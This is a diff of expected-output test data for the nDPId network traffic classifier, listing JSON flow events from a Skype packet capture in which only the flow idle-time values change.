00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":96,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969664405,"flow_last_seen":1431969664405,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.148","src_port":13021,"dst_port":40010,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969661414,"flow_last_seen":1431969661414,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.170","src_port":13021,"dst_port":40011,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969657367,"flow_last_seen":1431969657367,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.140","src_port":13021,"dst_port":40012,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":136,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969673443,"flow_last_seen":1431969673443,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.173","src_port":13021,"dst_port":40017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 
00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969662422,"flow_last_seen":1431969662422,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.143","src_port":13021,"dst_port":40018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} -00585{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":215,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969698797,"flow_last_seen":1431969718921,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":1336,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"23.206.33.166","src_port":50090,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00585{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":215,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969698797,"flow_last_seen":1431969718921,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":1336,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"23.206.33.166","src_port":50090,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969654389,"flow_last_seen":1431969654389,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.165","src_port":13021,"dst_port":40020,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969652367,"flow_last_seen":1431969652367,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.166","src_port":13021,"dst_port":40022,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":201,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969690481,"flow_last_seen":1431969690481,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.145","src_port":13021,"dst_port":40024,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 
@@ -1262,26 +1252,26 @@ 00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":275,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1431969745776,"flow_last_seen":1431969745776,"flow_idle_time":180000,"flow_min_l4_payload_len":132,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":265,"flow_avg_l4_payload_len":132,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"239.255.255.250","src_port":64560,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1431969643037,"flow_last_seen":1431969643092,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":51879,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"}} 
00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969655400,"flow_last_seen":1431969655400,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} -00642{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":242,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1431969714165,"flow_last_seen":1431969745160,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":327,"flow_tot_l4_payload_len":368,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.216.125","src_port":50111,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00585{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":242,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1431969714165,"flow_last_seen":1431969745160,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":327,"flow_tot_l4_payload_len":368,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.216.125","src_port":50111,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00642{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":242,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1431969714165,"flow_last_seen":1431969745160,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":327,"flow_tot_l4_payload_len":368,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.216.125","src_port":50111,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00585{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":242,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1431969714165,"flow_last_seen":1431969745160,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":327,"flow_tot_l4_payload_len":368,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.216.125","src_port":50111,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00832{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":241,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969713965,"flow_last_seen":1431969713965,"flow_idle_time":180000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.39","src_port":13021,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": 
{"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1431969642969,"flow_last_seen":1431969723490,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":270,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":49903,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00600{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":247,"flow_state":"info","flow_packets_processed":19,"flow_first_seen":1431969714902,"flow_last_seen":1431969731550,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":260,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"81.83.77.141","src_port":50116,"dst_port":17639,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":247,"flow_state":"info","flow_packets_processed":19,"flow_first_seen":1431969714902,"flow_last_seen":1431969731550,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":260,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"81.83.77.141","src_port":50116,"dst_port":17639,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00599{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":246,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969714399,"flow_last_seen":1431969726002,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":89,"flow_tot_l4_payload_len":256,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"86.31.35.30","src_port":50115,"dst_port":59621,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00583{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":246,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969714399,"flow_last_seen":1431969726002,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":89,"flow_tot_l4_payload_len":256,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"86.31.35.30","src_port":50115,"dst_port":59621,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00637{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":251,"flow_state":"finished","flow_packets_processed":40,"flow_first_seen":1431969716015,"flow_last_seen":1431969752089,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1124,"flow_tot_l4_payload_len":2961,"flow_avg_l4_payload_len":74,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"81.83.77.141","src_port":50121,"dst_port":17639,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00637{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":250,"flow_state":"finished","flow_packets_processed":100,"flow_first_seen":1431969715511,"flow_last_seen":1431969808618,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1183,"flow_tot_l4_payload_len":5646,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"86.31.35.30","src_port":50119,"dst_port":59621,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Unknown","breed":"Unrated"}} -00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1431969642376,"flow_last_seen":1431969712120,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":191,"flow_tot_l4_payload_len":2483,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"23.223.73.34","src_port":50027,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00600{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":247,"flow_state":"info","flow_packets_processed":19,"flow_first_seen":1431969714902,"flow_last_seen":1431969731550,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":260,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"81.83.77.141","src_port":50116,"dst_port":17639,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":247,"flow_state":"info","flow_packets_processed":19,"flow_first_seen":1431969714902,"flow_last_seen":1431969731550,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":260,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"81.83.77.141","src_port":50116,"dst_port":17639,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00599{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":246,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969714399,"flow_last_seen":1431969726002,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":89,"flow_tot_l4_payload_len":256,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"86.31.35.30","src_port":50115,"dst_port":59621,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00583{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":246,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969714399,"flow_last_seen":1431969726002,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":89,"flow_tot_l4_payload_len":256,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"86.31.35.30","src_port":50115,"dst_port":59621,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00637{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":251,"flow_state":"finished","flow_packets_processed":40,"flow_first_seen":1431969716015,"flow_last_seen":1431969752089,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1124,"flow_tot_l4_payload_len":2961,"flow_avg_l4_payload_len":74,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"81.83.77.141","src_port":50121,"dst_port":17639,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Unknown","breed":"Unrated"}} +00637{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":250,"flow_state":"finished","flow_packets_processed":100,"flow_first_seen":1431969715511,"flow_last_seen":1431969808618,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1183,"flow_tot_l4_payload_len":5646,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"86.31.35.30","src_port":50119,"dst_port":59621,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Unknown","breed":"Unrated"}} +00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1431969642376,"flow_last_seen":1431969712120,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":191,"flow_tot_l4_payload_len":2483,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"23.223.73.34","src_port":50027,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00834{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":240,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969713965,"flow_last_seen":1431969713965,"flow_idle_time":180000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.145","src_port":13021,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431969642398,"flow_last_seen":1431969668794,"flow_idle_time":180000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":322,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":49990,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00600{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":222,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431969705713,"flow_last_seen":1431969723790,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":108,"flow_tot_l4_payload_len":291,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.166","src_port":50099,"dst_port":40022,"l4_proto":"tcp","ndpi": 
{"proto":"Unknown","breed":"Unrated"}} -00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":222,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431969705713,"flow_last_seen":1431969723790,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":108,"flow_tot_l4_payload_len":291,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.166","src_port":50099,"dst_port":40022,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00602{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":213,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1431969697530,"flow_last_seen":1431969725781,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":77,"flow_tot_l4_payload_len":198,"flow_avg_l4_payload_len":11,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.146","src_port":50088,"dst_port":33033,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":213,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1431969697530,"flow_last_seen":1431969725781,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":77,"flow_tot_l4_payload_len":198,"flow_avg_l4_payload_len":11,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.146","src_port":50088,"dst_port":33033,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00600{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":222,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431969705713,"flow_last_seen":1431969723790,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":108,"flow_tot_l4_payload_len":291,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.166","src_port":50099,"dst_port":40022,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":222,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431969705713,"flow_last_seen":1431969723790,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":108,"flow_tot_l4_payload_len":291,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.166","src_port":50099,"dst_port":40022,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00602{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":213,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1431969697530,"flow_last_seen":1431969725781,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":77,"flow_tot_l4_payload_len":198,"flow_avg_l4_payload_len":11,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.146","src_port":50088,"dst_port":33033,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":213,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1431969697530,"flow_last_seen":1431969725781,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":77,"flow_tot_l4_payload_len":198,"flow_avg_l4_payload_len":11,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.146","src_port":50088,"dst_port":33033,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431969643971,"flow_last_seen":1431969670410,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":329,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":60288,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 